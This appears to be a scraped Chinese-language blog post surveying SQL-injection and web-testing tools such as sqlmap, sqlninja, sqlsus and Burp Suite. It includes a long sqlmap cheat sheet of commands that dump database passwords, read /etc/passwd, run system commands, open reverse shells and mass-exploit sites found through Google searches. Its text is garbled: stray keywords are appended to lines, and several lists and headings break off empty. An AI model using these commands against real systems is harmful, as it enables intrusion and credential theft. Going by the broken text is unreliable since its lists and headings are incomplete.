bbqsql是一個Python編寫的盲注工具,當檢測可疑的注入漏洞時會頗有用,同時bbqsql是一個半自動工具,容許客戶自定參數。java
DBPwAudit是一個數據庫用戶名和密碼枚舉工具。python
圖形化的密碼破解與鏈接工具,開源。
mysql
jsql是一款輕量級安全測試工具,能夠探測SQL注入漏洞,它跨平臺,開源免費,將存在注入漏洞的URL貼進來便可進行漏洞利用,圖形化界面親民,但使用效果有待提升。
web
包括一下幾個子工具,具體狀況具體分析使用:sql
該工具是一個Java開發的Oracle評估工具,它是基於插件結構的,當前有兩個插件能夠作:shell
一樣是針對Oracle的SID鏈接暴力枚舉的工具,SID爲Oracle實例化,Oracle鏈接字符串,經過實例名+用戶+密碼鏈接。
數據庫
容許用戶向Oracle數據庫中注入命令執行。
瀏覽器
它是一個開放源代碼的MySQL注入和接管工具,sqlsus使用perl編寫,基於命令行界面。sqlsus能夠獲取數據庫結構,注入本身的sql語句,從服務器下載文件,爬行web站點可寫目錄,上傳和控制後面人,克隆數據庫等等。最好用的兩點是注射獲取數據的速度很是快,另一個最大的特色是自動搜索可寫目錄。首先得生成配置文件sqlsus -g test.conf
,而後對配置文件進行修改;接着使用sqlsus test.conf
進行注入。
安全
在sql注入方面一直尊sqlmap爲神奇,但sqlninja也有本身的特色。
sqlninja是一款perl語言編寫的一個專門針對MSQSQL的注入工具。和市面上其餘注入工具不一樣,sqlninja沒有花費精力再跑數據庫上,而專一於獲取一個shell,其優勢以下:服務器
sqlmap是一個開源的漏洞測試工具,它主要用於自動化地偵測和實施SQL注入攻擊以及滲透數據庫服務器。SQLMAP配有強大的偵測引擎,適用於高級滲透測試用戶,不只能夠得到不一樣數據庫的指紋信息,還能夠從數據庫中提取數據,此外還可以處理潛在的文件系統以及經過帶外數據鏈接執行系統命令等。
sqlmap經常使用命令:
sqlmap -u "http://url/news?id=1" –current-user #獲取當前用戶名稱 sqlmap -u "http://www.xxoo.com/news?id=1" –current-db #獲取當前數據庫名稱 sqlmap -u "http://www.xxoo.com/news?id=1" –tables -D "db_name" #列表名 sqlmap -u "http://url/news?id=1" –columns -T "tablename" users-D "db_name" -v 0 #列字段 sqlmap -u "http://url/news?id=1" –dump -C "column_name" -T "table_name" -D "db_name" -v 0 #獲取字段內容
sqlmap -u "http://url/news?id=1" –smart –level 3 –users # smart智能 level 執行測試等級 sqlmap -u "http://url/news?id=1" –dbms "Mysql" –users # dbms 指定數據庫類型 sqlmap -u "http://url/news?id=1" –users #列數據庫用戶 sqlmap -u "http://url/news?id=1" –dbs#列數據庫 sqlmap -u "http://url/news?id=1" –passwords #數據庫用戶密碼 sqlmap -u "http://url/news?id=1" –passwords-U root -v 0 #列出指定用戶數據庫密碼 sqlmap -u "http://url/news?id=1" –dump -C "password,user,id" -T "tablename" -D "db_name" –start 1 –stop 20 #列出指定字段,列出20條 sqlmap -u "http://url/news?id=1" –dump-all -v 0 #列出全部數據庫全部表 sqlmap -u "http://url/news?id=1" –privileges #查看權限 sqlmap -u "http://url/news?id=1" –privileges -U root #查看指定用戶權限 sqlmap -u "http://url/news?id=1" –is-dba -v 1 #是不是數據庫管理員 sqlmap -u "http://url/news?id=1" –roles #枚舉數據庫用戶角色 sqlmap -u "http://url/news?id=1" –udf-inject #導入用戶自定義函數(獲取系統權限!) sqlmap -u "http://url/news?id=1" –dump-all –exclude-sysdbs -v 0 #列出當前庫全部表 sqlmap -u "http://url/news?id=1" –union-cols #union 查詢表記錄 sqlmap -u "http://url/news?id=1" –cookie "COOKIE_VALUE" #cookie注入 sqlmap -u "http://url/news?id=1" -b #獲取banner信息 sqlmap -u "http://url/news?id=1" –data "id=3" #post注入 sqlmap -u "http://url/news?id=1" -v 1 -f #指紋判別數據庫類型 sqlmap -u "http://url/news?id=1" –proxy"http://127.0.0.1:8118" #代理注入 sqlmap -u "http://url/news?id=1″–string」STRING_ON_TRUE_PAGE" #指定關鍵詞 sqlmap -u "http://url/news?id=1" –sql-shell #執行指定sql命令 sqlmap -u "http://url/news?id=1" –file /etc/passwd python sqlmap/sqlmap.py -u "http://url/news?id=1" –os-cmd=whoami #執行系統命令 sqlmap -u "http://url/news?id=1" –os-shell #系統交互shell sqlmap -u "http://url/news?id=1" –os-pwn #反彈shell sqlmap -u "http://url/news?id=1" –reg-read #讀取win系統註冊表 sqlmap -u "http://url/news?id=1" –dbs-o "sqlmap.log" #保存進度 sqlmap -u "http://url/news?id=1" –dbs -o "sqlmap.log" –resume #恢復已保存進度 sqlmap -g "google語法" –dump-all –batch #google搜索注入點自動 跑出全部字段攻擊實例 sqlmap -u "http://url/news?id=1&Submit=Submit" –cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" –string="Surname" –dbms=mysql –users –password
經過應用代理分析數據包,或修改數據包重放、暴力攻擊等安全測試中常常用到。
vega是一個開放源代碼的web應用程序安全測試平臺,Vega可以幫助用戶驗證sql注入、跨站腳本、敏感信息泄露和其餘一些安全漏洞,Vega使用java編寫,有GUI,能夠在Linux、OS X和Windows上運行,vega相似於怕肉絲 proxy等。
該軟件是一款代理軟件,包括HTTP代理,網絡爬蟲、網絡蜘蛛,會話ID分析,自動腳本接口。模糊測試工具,WEB格式的編碼/解碼,web服務描述語言和soap解析器等功能模塊,它基於GNU協議使用java編寫,是Webgoat中使用的工具之一。
paros proxy 是一個對web應用程序的漏洞進行評估的代理程序,即一個基於java的web代理程序,能夠評估web應用程序漏洞。它支持動態地編輯/查看http/https,從而改變cookie和表單字段等項目;它包括一個web通訊記錄程序,web全套程序,hash計算器,還有一個能夠測試常見的web應用程序攻擊的掃描器。該工具檢查漏洞形式包括:
burpsuite是用於攻擊web應用程序的處理平臺,它也是一個代理,經過默認端口8080運行。使用這個代理,咱們能夠截獲和修改從客戶端到web應用程序的數據包。它包含了一系列burp工具,這些工具之間有大量接口能夠互相通訊,這樣設計的目的是爲了促進和提升真個攻擊效率。平臺中全部工具共享同一robust框架,以便統一處理HTTP請求,持久性,認證,上游代理,日誌記錄,報警和可擴展性。
burpsuite容許攻擊者結合手工和自動技術去枚舉、分析、攻擊web應用程序。這些不一樣的burp工具經過協同工做,有效的分享信息,支持一某種工具中的信息爲基礎供另外一種工具使用的方式發起攻擊。
bed(bruteforce exploit dectector)是一個純文本協議的Fuzz工具,可以檢查常見的漏洞,如緩衝區溢出,格式串漏洞,整數溢出等。
THC出品的針對IPv6協議的模糊測試工具。
針對web應用的模糊測試工具 ,能夠進行web;應用暴力破解,也支持對網站目錄、登陸信息、應用資源文件等的暴力猜解,還能夠進行get和post參數的猜解,sql注入、xss漏洞的測試等。該工具全部功能都依賴於字典。
主要是對一個頁面或一個點進行測試,看是否存在xss漏洞。
web應用體系結構
web應用安全威脅
攻擊web服務器軟件的方式:
攻擊web應用程序
攻擊web數據內容
SQL注入的攻擊步驟和過程
web瀏覽器軟件的安全困境三要素:複雜性、可擴展性、連通性方面。
網頁掛馬策略: